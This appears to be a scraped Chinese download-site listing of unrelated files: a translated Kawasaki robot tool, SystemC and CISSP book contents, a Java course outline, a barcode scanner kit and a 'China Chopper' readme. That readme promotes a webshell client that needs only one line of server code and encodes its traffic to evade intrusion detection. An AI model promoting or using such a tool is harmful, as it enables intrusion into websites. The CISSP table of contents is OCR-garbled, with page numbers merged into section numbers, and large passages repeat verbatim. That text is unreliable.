本软件是川崎机器人辅助编程工具,出于对川崎机器人高精数控设备热爱特别汉化了本软件.汉化基于原程序修改,初期试验替换了软件内置的日语语言,但是由于程序没有调用变更语言的函数无法选择更换语言,故直接替换掉了英文内容.汉化说明:1.基于原程序进行汉化,替换掉了英文内容.2.由于对AS语言和指令不是特别熟悉所以部分汉化内容可能与实际意思有差异.3.汉化内容:菜单界面,对话框界面,标题栏,提示框内容,调用系统的窗口说明.4.版权对话框添加汉化信息.5.为保证稳定性保留两个汉化版本.KCwinTCP_sc为标准资源汉化(标准资源汉化),只汉化了菜单界面,对话框界面.KCwinTCP_all为完整资源汉化(标准资源汉化+非标准资源汉化),汉化了所有可见的英文提示内容.6.汉化所用软件:PEID0.95ResHackerUltraEdit7.如果软件存在使用问题和汉化内容不符请及时通知我.※特别提示:由于非标准资源的特殊性,汉化后字符长度不符,故采用0填充和空格填充,稳定性未测试.※如果KCwinTCP_all使用中出现问题请改用KCwinTCP_sc.汉化:闪剑QQ:2950***
2025/3/28 20:12:36
296KB
1
第1章绪论1.1什么是SystemC?1.2为何采用SystemC?1.3设计方法1.4设计能力1.5SystemCRTL1.6本书的组织结构1.7练习第2章SystemC入门2.1基础知识2.2再看一个2*4译码电路示例2.3描述层次关系2.4验证功能2.5练习第3章数据类型3.1值保持器3.2类型概述3.3位类型3.4任意位宽的位类型3.5逻辑类型3.6任意位宽的逻辑类型3.7有符号整型3.8无符号整型3.9任意精度的有符号整型3.10任意精度的无符号整型3.11解析式类型3.12用户定义的数据类型3.13推荐采用的数据类型3.14练习第4章组合逻辑建模4.1SC-MODULE4.1.1文件结构4.2示例4.3读写端口和信号4.4逻辑算符4.5算术算符4.5.1无符号算术4.5.2有符号算术4.6关系算符4.7向量与位区间4.7.1常量下标4.7.2不是常量的下标4.8if语句4.9switch语句4.10循环语句4.11方法4.12结构体类型4.13多个进程的△延迟4.14小结4.15练习第5章同步逻辑建模5.1触发器建模5.2多个进程5.3带异步预置位和清零的触发器5.4带同步预置位和清零的触发器5.5多个时钟与多相位时钟5.6锁存器建模5.6.1if语句5.6.2switch语句5.6.3避免产生锁存器5.7小结5.8练习第6章其他逻辑6.1三态驱动器6.2多个驱动器6.3无关值处理6.4层次结构6.5模块的参数化6.6变量和信号的赋值6.7练习第7章建模示例7.1可参数化的三态输出寄存器7.2存储器模型7.3有限状态机建模7.3.1Moore有限状态机7.3.2Mealy有限状态机7.4通用移位寄存器7.5计数器7.5.1模N计数器7.5.2约翰逊计数器7.5.3格雷码可逆计数器7.6约翰逊译码器7.7阶乘模型7.8练习第8章测试平台8.1编写测试平台8.2仿真控制8.2.1sc_clock8.2.2sc_trace8.2.3sc_start8.2.4sc_stop8.2.5sc_time_stamp8.2.6sc_simulation_time8.2.7sc_cycle和sc_initialize8.2.8sc_time8.3波形8.3.1任意波形8.3.2复杂的重复波形8.3.3派生时钟的生成8.3.4从文件中读取激励8.3.5反应式激励8.4监听行为8.4.1断言正确的行为8.4.2将结果转储至文本文件8.5其他示例8.5.1触发器8.5.2同步输出的多路选择器8.5.3全加器8.5.4周期级仿真8.6sc_main函数内的语句次序8.7记录聚合类型8.8练习第9章系统级建模9.1SC_THREAD型进程9.2动态敏感9.3构造函数的参数9.4其他示例9.4.1最大公因子9.4.2滤波器9.5端口、接口和信道9.6高级论题9.6.1共享数据成员9.6.2定点类型9.6.3模块9.6.4其他方法9.7仿真算法9.8练习附录A运行时环境A.1软件安装A.2编译A.3仿真A.4调试附录BSystemCRTL:可综合的子集B.1SystemC语言要素B.2C++语言要素
2025/2/7 11:47:25
6.27MB
1
PingFangSC,PingFang-SC-Thin,PingFang-SC-Regular,PingFang-SC-Medium,PingFangSC-Light,PingFangSC-Medium
2025/1/28 20:53:12
50.62MB
1
CISSPExamGuide.AllinOne.7thEdition,CISSP认证考试指南第7版,中文,扫描版,带完整章节索引前言(续表)安全领域描述资产安全这个领域解释了在整个信息资产生命周期中如何对信息资产进行保护。
该领域的部分主题包括:信息分类保持的所有权隐私●保留●数据安全控制●需求处理安全工程这个领域解释了在面对无数威胁的情况下如何保护信息系统发展的安全。
该领域的部分主题包括:●安全设计原则选择有效的措施●缓解脆弱性密码学站点和设施的安全设计物理安全通信与网络安全这个领域解释如何理解保护网络架构、通信技术和网络协议的安全目标。
该领域的部分主题包括:安全的网络架构●网络组件安全的通信信道网络层攻击身份与访问管理身份与访问管理是信息安全中最重要的主题之一。
这个领域涵盖了用户和系统之间、系统和其他系统之间的相互关系。
该领域的部分主题包括:●控制物理和逻辑访问●身份标识与认证身份即服务第三方身份服务●授权方法●访问控制攻击安全评估与测试这个领域解释了验证我们的信息系统安全的方法。
该领域的部分主题包括评估和测试策略测试安全控制●收集安全过程数据●分析和报告结果●开展和促进审计C|sSP认证考试指南(第7版)(续表)安全领域描述安全运营这个领域涵盖了在我们日常业务中许多维护网络安全的活动。
该领域的部分主题包括:支持调查●日志和监控安全资源配置事故管理●预防措施变更管理●业务连续性●物理安全管理软件开发安全这个领域解释了应用安全原则去获取和开发软件系统。
该领域的部分主题包括软件开发生命周期中的安全●开发活动中的安全控制评估软件安全评估外部获取软件的安全性为紧跟安全领域的新技术和新方法,(SC)每年都要在试题库中加入大量新试题。
这些试题都基于最新的技术、运用、方法和标准。
例如,1998年的CⅠSSP认证考试没有出现关于无线安全、跨站点脚本攻击或IPv6的问题。
本书概要如果你想成为一名经过(SC)2认证的CISSP,那么在本书里能找到需要了解的所有内容。
本书讲述企业如何制定和实现策略、措施、指导原则和标准及其原因;介绍网络、应用程序和系统的脆弱性,脆弱性的被利用情况以及如何应对这些威胁;解释物理安全、操作安全以及不同系统会采用不同安全机制的原因。
此外,本书还回顾美国与国际上用于测试系统安全性的安全准则和评估体系,诠释这些准则的含义及其使用原因。
最后,本书还将阐明与计算机系统及其数据相关的各种法律责任问题,例如计算机犯罪、法庭证物以及如何为出庭准备计算机证据尽管本书主要是为CISSP考试撰写的学习指南,但在你通过认证后,它仍不失为一本不可替代的重要参考用书。
C|SSP应试小贴士许多人考试时会感觉题目比较绕弯。
所以一定要仔细阅读问题和所有备选答案,而不是看了几个单词就断定自己已知道问题的答案。
某些答案选项的差别不明显,这就需要你花一些时间耐心地将问题再阅读领会几遍。
XVCISSPanquanshuo前言有人抱怨sSsP考试略带主观色彩。
例如,有这样两个问题。
第一个是技术问题,考查的是防止中间人攻击的TLS(ransportLayerSecurity,,传输层安全)所采用的具体机制;第二个问题则询问周长为8英尺的栅栏提供的是低级、中级还是高级的安全防护。
你会发现,前一个问题比后一个问题更容易回答。
许多问题要求应试人员选择最佳方法,而一些人会认为很难说哪一个是最佳方法,因为这都带有主观色彩。
此处给出这样的示例并非是批评(SC)2和出题人员,而是为了帮助你更好地准备这项考试。
本书涵盖了所有的考试范围和需要掌握的内容,同时提供了大量问题和自测试卷。
大部分问题的格式都采用了实际试题的形式,使你能更好地准备应对真实的考试。
因此,你一定要阅读本书的全部内容,同时特别注意问题及其格式。
有时,即使对某个主题十分了解,你也可能答错题。
因此,我们需要学会如何应试。
在回答某些问题时,要记住,一些事物比其他东西更有价值。
例如,保护人身安全和福利几乎总是高于所有其他方面。
与此类似,如果所有其他因素都比较便宜,第二个会赢得大部分时间。
专家意见(例如:从律师那里获得的)比那些拥有较少认证的人的意见更有价值。
如果一个问题的可选项之一是寻求或获得专家意见,请密切关注这个问题。
正确的答案可能是寻求那位专家的意见。
尽量让自己熟悉行业标准,并了解自己工作之外的技术知识和方法。
再次强调一下,即使你在某个领域是专家,仍然可能不熟悉考试所涉及的全部领域。
当你在PearsonVUE考试中心参加CP考试时,其他认证考试可能会在同一个房间同时进行。
如果你看到别人很早离开房间,不要感到匆忙;他们可能是因为参加一个较短的考试。
如何使用本书本书的作者尽了很大努力才将所有重要信息汇编成书:现在,轮到你尽力从本书中汲取知识要从本书受益最大,可采用以下学习方法认真学习每个章节,真正理解其中介绍的每个概念。
许多概念都必须完全理解,如果对些概念似懂非懂,那么对你来说将是非常不利的。
CISSPCBK包含数以千计的不同主题,因此需要花时间掌握这些内容。
确认学习和解答所有问题。
如果不能正确解答其中的问题,那么需要再次阅读相关的章节。
需要记住,真实考试中的某些问题含糊其辞,看上去比较难回答,不要误以为这些问题表述不清楚而忽视了这些含糊其辞的问题。
相反,它们的存在具有明确的目的性,对此要特别注意。
如果你对某些具体的主题(如防火墙、法律、物理安全或协议功能)不熟悉,那么需要通过其他信息源(书籍和文章等)以达到对这些主题更深入的理解程度,而不是局限于自认为通过CISSP考试所需的范围。
阅读本书后,你需要学习所有问题和答案,并进行自测。
接着,查看(SC)2的学习指南,确信对列出的每条内容都十分了解。
如果对某些内容还感到困惑,那么请重新复习相关的章节。
如果参加过其他资格认证考试(如Cisco、Nove和Microsoft的认证考试,那么你可能习惯于记忆一些细节和配置参数。
但请记住,CISSP考试强调“寸之深、亩之阔”,因此在记忆具体细节之前一定要先掌握每个主题中的各种概念记住该考试是需要找出最佳答案,所以,对于有些问题应试人员可能会对全部或部分答案持不同意见。
记住要在所给的4个答案中找出最合理的那一个。
CISSPanquanshuoCsSP认证考试指南(第7版)配套练习题本书配套网站提供1400道练习题,其中既有热点问题,也有“拖放”问题。
读者可访问htp:/vww.tupwk.com.cn/downpage,输入本书中文书名或ISBN下载,也可直接扫描本书封底的.维码下载。
XVICISSPanquanshuo目录第1章安全和风险管理1.10策略、标准、基线、指南和过程··········1.1安全基本原则1.10.1安全策略…621.11可用性……31.102标准…641.1.2完整性…03基线651.1.3机密性…1.104指南…661.14平衡安全12安全定义…1.105措施………661.10.6实施1.3控制类型14安全框架1.11风险管理………67……………101.111全面的风险管理…6814.1ISO/IEC27000系列12l.11.2信息系统风险管理策略68142企业安全架构开发……………141.113风险管理团队…69143安全控制开发231114风险管理过程691.44流程管理开发……261.12威胁建模………70145功能与安全性…321.121脆弱性…701.5计算机犯罪法的难题…………3216网络犯罪的复杂性1.122威胁71………341.123攻击………7116.1电子资产……351.124消减分析·16.2攻击的演变3672113风险评估和分析1.6.3国际问题………381.131风险分析团队74164法律的类型………………4117知识产权法1.132信息和资产的价值741.133构成价值的成本……7517.1商业秘密…441.134识别脆弱性和威胁75172版权45173商标…451.13.5风险评估方法………761.13.6风险分析方法…0174专利……1.137定性风险分析…83175知识产权的内部保护471138保护机制8617.6软件盗版4818隐私……………………501.139综合考虑………881.13.10总风险与剩余风险881.81对隐私法不断增长的需求……5111311处理风险…891.8.2法律、指令和法规……521.83员工隐私问题…11312外包…………………90…581.14风险管理框架…9119数据泄露……………………59141信息分类191美国的数据泄露相关法律…6092192其他国家有关数据泄露的法律…611.142安全控制的选择CISSPanquanshuoCISSP认证考试指南(第7版)1.143安全控制的实现…93237变更控制分析员……1481.144安全控制的评估……………93238数据分析员……1491.14.5信息系统的授权…93239用户………1491.146安全控制的监管9323.10审计员…1491.15业务连续性与灾难恢复942311为何需要这么多角色…1491.151标准和最佳实践…9624保留策略………………1491.152使BCM成为企业安全计划的25保护隐私…………152一部分…………98251数据所有者……1531153BCP项目的组成……100252数据处理者………153116人员安全……111253数据残留……1531.16.1招聘实践1122.54收集的限制…1561.162解雇………………11326保护资产…1561163安全意识培训114261数据安全控制…1571.164学位或证书…2.62介质控制1591.17安全治理11527数据泄露1631.18道德………………………………12028保护其他资产……1701.181计算机道德协会1202.8.1保护移动设备……1701.182互联网架构研究委员会…121282纸质记录…1711.183企业道德计划12228.3保险箱………1711.19小结…12229小结172120快速提示1232.10快速提示……………………………172121问题…1262.11问题122答案…133212答案……176第2章资产安全…………137第3章安全工程…17921信息生命周期………………1373.1系统架构…………………1802.11获取………1383.2计算机架构…2.12使用138321中央处理单元2.1.3存档…139322多重处理…1862.14处置……13932.3存储器类型……1872,2信息分类……14033操作系统……197221分类等级3.3.1进程管理19722.2分类控制…1433.32存储器管理…20423责任分层…………1443.33输入输出设备管理……20723.1行政管理层…………144334CPU架构集成………209232数据所有者…14733.5操作系统架构………212233数据看管员…1473.36虚拟机…217234系统所有者…14834系统安全架构……21923.5安全管理员……14834.1安全策略……21923.6主管……14842安全架构要求……220CISSPanquanshuo目录3.5安全模型…2243.14.2分组密码与流密码……2633.51Bell-LaPadula模型…22431.3混合加密方法……267352Biba模型……2253.15对称系统的类型…………272353Clark-Wilson模型…225351数据加密标准…272354无干扰模型263.152三重DEs…3.55BrewerandNash模型…2273153高级加密标准……278356Graham-Denning模型……2273.154国际数据加密算法…2793.57Harrison-Ruzzo-UIIman模型…2273.155Blowfish…………27936系统评估方法…315.6RC4………279361通用准则…2293157RCS…………………27936,2对产品进行评估的原因……2323158RC6…2803.7认证与认可232316非对称系统的类型……2803.71认证……2323.161Diie-Hellman算法280372认可2333.16.2RSA…………………28238开放系统与封闭系统……………2343.16.3ElGamal.284381开放系统…2343164椭圆曲线密码系统284382封闭系统…2343.165背包算法……………28539分布式系统安全……………2343166零知识证明…285391云计算…………2353.17消息完整性…286392并行计算…235317.1单向散列…86393数据库……236317.2各种散列算法290394web应用…238317.3MD4……………291395移动设备2393.174MD5………29139.6网络物理系统…2403175SHA……2913.10一些对安全模型和架构的威胁…242317.6针对单向散列函数的攻击…2913.101维护陷阱……243377数字签名……2923102检验时间/使用时间攻击…2433178数字签名标准2943.1密码学背景…44318公钥基础设施………2943.12密码学定义与概念2493181认证授权机构…2953121Kerckhof原则…2513182证书………2973122密码系统的强度………2513.183注册授权机构………2973.123密码系统的服务……2523184PKI步骤…2973124一次性密码本…2523.19密钥管理2993.12.5滚动密码与隐藏密码…2543191密钥管理原则…3003126隐写术…2553192密钥和密钥管理的规则…3013.13密码的类型…2573.20可信平台模块301313.1替代密码…257321针对密码学的攻击…………3033132换位密码……257321.1唯密文攻击…………3033.14加密的方法……………2593.212已知明文攻击…3033.14.1对称算法与非对称算法2593213选定明文攻击……303XIXCISSPanquanshuocSSP认证考试指南第7版)3.214选定密文攻击………3044.3TCP/P模型………366321.5差分密码分析…………3044.3.1TCP……3673.21.6线性密码分析…3044.32TP寻址371321.7旁路攻击…3054.33mPv6………3733218重放攻击…305434第2层安全标准3763.219代数攻击3054.35汇聚协议……377321.10分析式攻击…30644传输类型………3783.21.11统计式攻击…………30644.1模拟和数字……378321.12社会工程攻击…306442异步和同步……379321.13中间相遇攻击……30644.3宽带和基带…381322站点和设施安全……30645线缆…………382323站点规划过程……307451同轴电缆…3823.23.1通过环境设计来预防犯罪…310452双绞线e。
·。
非·申非·非非非非…382323.,2制订物理安全计划…………314453光缆…3833.24保护资产…………………………3244.54布线问题………3843.241保护移动设备…3244.6网络互联基础·3863242使用保险柜……3254.6.1网络拓扑3863.25内部支持系统………………325462介质访问技术……3883251电力…325463传输方法……3973.252环境问题…3294.64网络协议和服务…3983253火灾的预防、检测和扑灭……331465域名服务……4053.26小结33546.6电子邮件服务……4103.27快速提示…………336467网络地址转换…414328问题……340468路由协议………416329答案3464.7网络互联设备4194.7.1中继器…420第4章通信与网络安全…351472网桥…4204.1通信……3524.73路由器42开放系统互连参考模型……422353474交换机423421协议………3544.75网关……427422应用层……3564.7.6PBX…42842.3表示层……3564.77防火墙…431424会话层…3574.7.8代理服务器…44842.5传输层…3594.7.9蜜罐·…45042.6网络层1非·非,36047.10统一威胁管理450427数据链路层…3604711内容分发网络…4514.28物理层……3624712软件定义网络…452429OSI模型中的功能和协议…36248内联网与外联网4544,2.10综合这些层…36449城域网………94554211多层协议…3654.10广域网………………457CISSPanquanshuo
该领域的部分主题包括:信息分类保持的所有权隐私●保留●数据安全控制●需求处理安全工程这个领域解释了在面对无数威胁的情况下如何保护信息系统发展的安全。
该领域的部分主题包括:●安全设计原则选择有效的措施●缓解脆弱性密码学站点和设施的安全设计物理安全通信与网络安全这个领域解释如何理解保护网络架构、通信技术和网络协议的安全目标。
该领域的部分主题包括:安全的网络架构●网络组件安全的通信信道网络层攻击身份与访问管理身份与访问管理是信息安全中最重要的主题之一。
这个领域涵盖了用户和系统之间、系统和其他系统之间的相互关系。
该领域的部分主题包括:●控制物理和逻辑访问●身份标识与认证身份即服务第三方身份服务●授权方法●访问控制攻击安全评估与测试这个领域解释了验证我们的信息系统安全的方法。
该领域的部分主题包括评估和测试策略测试安全控制●收集安全过程数据●分析和报告结果●开展和促进审计C|sSP认证考试指南(第7版)(续表)安全领域描述安全运营这个领域涵盖了在我们日常业务中许多维护网络安全的活动。
该领域的部分主题包括:支持调查●日志和监控安全资源配置事故管理●预防措施变更管理●业务连续性●物理安全管理软件开发安全这个领域解释了应用安全原则去获取和开发软件系统。
该领域的部分主题包括软件开发生命周期中的安全●开发活动中的安全控制评估软件安全评估外部获取软件的安全性为紧跟安全领域的新技术和新方法,(SC)每年都要在试题库中加入大量新试题。
这些试题都基于最新的技术、运用、方法和标准。
例如,1998年的CⅠSSP认证考试没有出现关于无线安全、跨站点脚本攻击或IPv6的问题。
本书概要如果你想成为一名经过(SC)2认证的CISSP,那么在本书里能找到需要了解的所有内容。
本书讲述企业如何制定和实现策略、措施、指导原则和标准及其原因;介绍网络、应用程序和系统的脆弱性,脆弱性的被利用情况以及如何应对这些威胁;解释物理安全、操作安全以及不同系统会采用不同安全机制的原因。
此外,本书还回顾美国与国际上用于测试系统安全性的安全准则和评估体系,诠释这些准则的含义及其使用原因。
最后,本书还将阐明与计算机系统及其数据相关的各种法律责任问题,例如计算机犯罪、法庭证物以及如何为出庭准备计算机证据尽管本书主要是为CISSP考试撰写的学习指南,但在你通过认证后,它仍不失为一本不可替代的重要参考用书。
C|SSP应试小贴士许多人考试时会感觉题目比较绕弯。
所以一定要仔细阅读问题和所有备选答案,而不是看了几个单词就断定自己已知道问题的答案。
某些答案选项的差别不明显,这就需要你花一些时间耐心地将问题再阅读领会几遍。
XVCISSPanquanshuo前言有人抱怨sSsP考试略带主观色彩。
例如,有这样两个问题。
第一个是技术问题,考查的是防止中间人攻击的TLS(ransportLayerSecurity,,传输层安全)所采用的具体机制;第二个问题则询问周长为8英尺的栅栏提供的是低级、中级还是高级的安全防护。
你会发现,前一个问题比后一个问题更容易回答。
许多问题要求应试人员选择最佳方法,而一些人会认为很难说哪一个是最佳方法,因为这都带有主观色彩。
此处给出这样的示例并非是批评(SC)2和出题人员,而是为了帮助你更好地准备这项考试。
本书涵盖了所有的考试范围和需要掌握的内容,同时提供了大量问题和自测试卷。
大部分问题的格式都采用了实际试题的形式,使你能更好地准备应对真实的考试。
因此,你一定要阅读本书的全部内容,同时特别注意问题及其格式。
有时,即使对某个主题十分了解,你也可能答错题。
因此,我们需要学会如何应试。
在回答某些问题时,要记住,一些事物比其他东西更有价值。
例如,保护人身安全和福利几乎总是高于所有其他方面。
与此类似,如果所有其他因素都比较便宜,第二个会赢得大部分时间。
专家意见(例如:从律师那里获得的)比那些拥有较少认证的人的意见更有价值。
如果一个问题的可选项之一是寻求或获得专家意见,请密切关注这个问题。
正确的答案可能是寻求那位专家的意见。
尽量让自己熟悉行业标准,并了解自己工作之外的技术知识和方法。
再次强调一下,即使你在某个领域是专家,仍然可能不熟悉考试所涉及的全部领域。
当你在PearsonVUE考试中心参加CP考试时,其他认证考试可能会在同一个房间同时进行。
如果你看到别人很早离开房间,不要感到匆忙;他们可能是因为参加一个较短的考试。
如何使用本书本书的作者尽了很大努力才将所有重要信息汇编成书:现在,轮到你尽力从本书中汲取知识要从本书受益最大,可采用以下学习方法认真学习每个章节,真正理解其中介绍的每个概念。
许多概念都必须完全理解,如果对些概念似懂非懂,那么对你来说将是非常不利的。
CISSPCBK包含数以千计的不同主题,因此需要花时间掌握这些内容。
确认学习和解答所有问题。
如果不能正确解答其中的问题,那么需要再次阅读相关的章节。
需要记住,真实考试中的某些问题含糊其辞,看上去比较难回答,不要误以为这些问题表述不清楚而忽视了这些含糊其辞的问题。
相反,它们的存在具有明确的目的性,对此要特别注意。
如果你对某些具体的主题(如防火墙、法律、物理安全或协议功能)不熟悉,那么需要通过其他信息源(书籍和文章等)以达到对这些主题更深入的理解程度,而不是局限于自认为通过CISSP考试所需的范围。
阅读本书后,你需要学习所有问题和答案,并进行自测。
接着,查看(SC)2的学习指南,确信对列出的每条内容都十分了解。
如果对某些内容还感到困惑,那么请重新复习相关的章节。
如果参加过其他资格认证考试(如Cisco、Nove和Microsoft的认证考试,那么你可能习惯于记忆一些细节和配置参数。
但请记住,CISSP考试强调“寸之深、亩之阔”,因此在记忆具体细节之前一定要先掌握每个主题中的各种概念记住该考试是需要找出最佳答案,所以,对于有些问题应试人员可能会对全部或部分答案持不同意见。
记住要在所给的4个答案中找出最合理的那一个。
CISSPanquanshuoCsSP认证考试指南(第7版)配套练习题本书配套网站提供1400道练习题,其中既有热点问题,也有“拖放”问题。
读者可访问htp:/vww.tupwk.com.cn/downpage,输入本书中文书名或ISBN下载,也可直接扫描本书封底的.维码下载。
XVICISSPanquanshuo目录第1章安全和风险管理1.10策略、标准、基线、指南和过程··········1.1安全基本原则1.10.1安全策略…621.11可用性……31.102标准…641.1.2完整性…03基线651.1.3机密性…1.104指南…661.14平衡安全12安全定义…1.105措施………661.10.6实施1.3控制类型14安全框架1.11风险管理………67……………101.111全面的风险管理…6814.1ISO/IEC27000系列12l.11.2信息系统风险管理策略68142企业安全架构开发……………141.113风险管理团队…69143安全控制开发231114风险管理过程691.44流程管理开发……261.12威胁建模………70145功能与安全性…321.121脆弱性…701.5计算机犯罪法的难题…………3216网络犯罪的复杂性1.122威胁71………341.123攻击………7116.1电子资产……351.124消减分析·16.2攻击的演变3672113风险评估和分析1.6.3国际问题………381.131风险分析团队74164法律的类型………………4117知识产权法1.132信息和资产的价值741.133构成价值的成本……7517.1商业秘密…441.134识别脆弱性和威胁75172版权45173商标…451.13.5风险评估方法………761.13.6风险分析方法…0174专利……1.137定性风险分析…83175知识产权的内部保护471138保护机制8617.6软件盗版4818隐私……………………501.139综合考虑………881.13.10总风险与剩余风险881.81对隐私法不断增长的需求……5111311处理风险…891.8.2法律、指令和法规……521.83员工隐私问题…11312外包…………………90…581.14风险管理框架…9119数据泄露……………………59141信息分类191美国的数据泄露相关法律…6092192其他国家有关数据泄露的法律…611.142安全控制的选择CISSPanquanshuoCISSP认证考试指南(第7版)1.143安全控制的实现…93237变更控制分析员……1481.144安全控制的评估……………93238数据分析员……1491.14.5信息系统的授权…93239用户………1491.146安全控制的监管9323.10审计员…1491.15业务连续性与灾难恢复942311为何需要这么多角色…1491.151标准和最佳实践…9624保留策略………………1491.152使BCM成为企业安全计划的25保护隐私…………152一部分…………98251数据所有者……1531153BCP项目的组成……100252数据处理者………153116人员安全……111253数据残留……1531.16.1招聘实践1122.54收集的限制…1561.162解雇………………11326保护资产…1561163安全意识培训114261数据安全控制…1571.164学位或证书…2.62介质控制1591.17安全治理11527数据泄露1631.18道德………………………………12028保护其他资产……1701.181计算机道德协会1202.8.1保护移动设备……1701.182互联网架构研究委员会…121282纸质记录…1711.183企业道德计划12228.3保险箱………1711.19小结…12229小结172120快速提示1232.10快速提示……………………………172121问题…1262.11问题122答案…133212答案……176第2章资产安全…………137第3章安全工程…17921信息生命周期………………1373.1系统架构…………………1802.11获取………1383.2计算机架构…2.12使用138321中央处理单元2.1.3存档…139322多重处理…1862.14处置……13932.3存储器类型……1872,2信息分类……14033操作系统……197221分类等级3.3.1进程管理19722.2分类控制…1433.32存储器管理…20423责任分层…………1443.33输入输出设备管理……20723.1行政管理层…………144334CPU架构集成………209232数据所有者…14733.5操作系统架构………212233数据看管员…1473.36虚拟机…217234系统所有者…14834系统安全架构……21923.5安全管理员……14834.1安全策略……21923.6主管……14842安全架构要求……220CISSPanquanshuo目录3.5安全模型…2243.14.2分组密码与流密码……2633.51Bell-LaPadula模型…22431.3混合加密方法……267352Biba模型……2253.15对称系统的类型…………272353Clark-Wilson模型…225351数据加密标准…272354无干扰模型263.152三重DEs…3.55BrewerandNash模型…2273153高级加密标准……278356Graham-Denning模型……2273.154国际数据加密算法…2793.57Harrison-Ruzzo-UIIman模型…2273.155Blowfish…………27936系统评估方法…315.6RC4………279361通用准则…2293157RCS…………………27936,2对产品进行评估的原因……2323158RC6…2803.7认证与认可232316非对称系统的类型……2803.71认证……2323.161Diie-Hellman算法280372认可2333.16.2RSA…………………28238开放系统与封闭系统……………2343.16.3ElGamal.284381开放系统…2343164椭圆曲线密码系统284382封闭系统…2343.165背包算法……………28539分布式系统安全……………2343166零知识证明…285391云计算…………2353.17消息完整性…286392并行计算…235317.1单向散列…86393数据库……236317.2各种散列算法290394web应用…238317.3MD4……………291395移动设备2393.174MD5………29139.6网络物理系统…2403175SHA……2913.10一些对安全模型和架构的威胁…242317.6针对单向散列函数的攻击…2913.101维护陷阱……243377数字签名……2923102检验时间/使用时间攻击…2433178数字签名标准2943.1密码学背景…44318公钥基础设施………2943.12密码学定义与概念2493181认证授权机构…2953121Kerckhof原则…2513182证书………2973122密码系统的强度………2513.183注册授权机构………2973.123密码系统的服务……2523184PKI步骤…2973124一次性密码本…2523.19密钥管理2993.12.5滚动密码与隐藏密码…2543191密钥管理原则…3003126隐写术…2553192密钥和密钥管理的规则…3013.13密码的类型…2573.20可信平台模块301313.1替代密码…257321针对密码学的攻击…………3033132换位密码……257321.1唯密文攻击…………3033.14加密的方法……………2593.212已知明文攻击…3033.14.1对称算法与非对称算法2593213选定明文攻击……303XIXCISSPanquanshuocSSP认证考试指南第7版)3.214选定密文攻击………3044.3TCP/P模型………366321.5差分密码分析…………3044.3.1TCP……3673.21.6线性密码分析…3044.32TP寻址371321.7旁路攻击…3054.33mPv6………3733218重放攻击…305434第2层安全标准3763.219代数攻击3054.35汇聚协议……377321.10分析式攻击…30644传输类型………3783.21.11统计式攻击…………30644.1模拟和数字……378321.12社会工程攻击…306442异步和同步……379321.13中间相遇攻击……30644.3宽带和基带…381322站点和设施安全……30645线缆…………382323站点规划过程……307451同轴电缆…3823.23.1通过环境设计来预防犯罪…310452双绞线e。
·。
非·申非·非非非非…382323.,2制订物理安全计划…………314453光缆…3833.24保护资产…………………………3244.54布线问题………3843.241保护移动设备…3244.6网络互联基础·3863242使用保险柜……3254.6.1网络拓扑3863.25内部支持系统………………325462介质访问技术……3883251电力…325463传输方法……3973.252环境问题…3294.64网络协议和服务…3983253火灾的预防、检测和扑灭……331465域名服务……4053.26小结33546.6电子邮件服务……4103.27快速提示…………336467网络地址转换…414328问题……340468路由协议………416329答案3464.7网络互联设备4194.7.1中继器…420第4章通信与网络安全…351472网桥…4204.1通信……3524.73路由器42开放系统互连参考模型……422353474交换机423421协议………3544.75网关……427422应用层……3564.7.6PBX…42842.3表示层……3564.77防火墙…431424会话层…3574.7.8代理服务器…44842.5传输层…3594.7.9蜜罐·…45042.6网络层1非·非,36047.10统一威胁管理450427数据链路层…3604711内容分发网络…4514.28物理层……3624712软件定义网络…452429OSI模型中的功能和协议…36248内联网与外联网4544,2.10综合这些层…36449城域网………94554211多层协议…3654.10广域网………………457CISSPanquanshuo
2024/12/24 22:55:02
150.32MB
1
(课程网站https://class.imooc.com/sc/18?)1:Java基础语法本步骤涵盖Java程序结构、开发环境搭建、常量与变量、运算符、流程控制、数组和方法等Java基础语法的内容。
通过本步骤学习,可以掌握Java程序的执行流程,能够编写符合Java语法规则的程序。
2:Java面向对象在本步骤中,我们将带你逐步认识如何通过Java语言实现面向对象的三大特征继承、封装、多态,并编写具有面向对象思想的Java程序3:Java常用工具类在本步骤中,将会介绍最常用的Java工具类,包括异常、包装器类、字符串处理类、集合框架及其实现类、泛型、多线程和输入输出流等内容。
学习了这些,定让你的Java技能更上一层楼。
通过本步骤学习,可以掌握Java程序的执行流程,能够编写符合Java语法规则的程序。
2:Java面向对象在本步骤中,我们将带你逐步认识如何通过Java语言实现面向对象的三大特征继承、封装、多态,并编写具有面向对象思想的Java程序3:Java常用工具类在本步骤中,将会介绍最常用的Java工具类,包括异常、包装器类、字符串处理类、集合框架及其实现类、泛型、多线程和输入输出流等内容。
学习了这些,定让你的Java技能更上一层楼。
2024/12/14 19:23:39
70B
1
1、honeywell条码扫描枪1400g设置步骤.doc:详细记录将1400g设置为串口模式的方法。
2、HSMUSBSerialDriverversion3.5.5.zip:1400g串口驱动。
3、vcredist_x64.exe:一些情况下串口驱动安装时需要使用的软件包。
4、UartAssist.exe:串口调试助手。
5、Honeywell1400g例程.zip:VS2013环境下wpf开发,1400g串口模式下的使用例程。
6、VG1400-SC-QSRevA.pdf:中文1400g简易参考手册。
7、VG1400-UGRevC.pdf:英文1400g详细参考手册。
2、HSMUSBSerialDriverversion3.5.5.zip:1400g串口驱动。
3、vcredist_x64.exe:一些情况下串口驱动安装时需要使用的软件包。
4、UartAssist.exe:串口调试助手。
5、Honeywell1400g例程.zip:VS2013环境下wpf开发,1400g串口模式下的使用例程。
6、VG1400-SC-QSRevA.pdf:中文1400g简易参考手册。
7、VG1400-UGRevC.pdf:英文1400g详细参考手册。
2024/11/30 14:57:05
31.84MB
1
产品名称:中国菜刀(Chinachopper)生产厂家:中国菜刀贸易有限公司厂家地址:http://www.maicaidao.com/----------------------------------------------------------------------------------------------------------免责申明: 请使用者注意使用环境并遵守国家相关法律法规! 由于使用不当造成的后果本厂家不承担任何责任!----------------------------------------------------------------------------------------------------------友情提示:程序在使用过程中难免有各种BUG,到官网看一下是否有更新吧,说不定己经修补了呢。
UINCODE方式编译,支持多国语言输入显示。
在非简体中文环境下使用,自动更换成英文界面,翻译有误的地方请留言指正。
一、脚本客户端(包括但不限于EVAL)部分 1)要了解的 服务端只需要简单的一行代码,即可用此程序实现常用的管理功能,功能代码二次编码后发送,过IDS的能力大幅提高。
目前支持的服务端脚本:PHP,ASP,ASP.NET,并且支持https安全连接的网站。
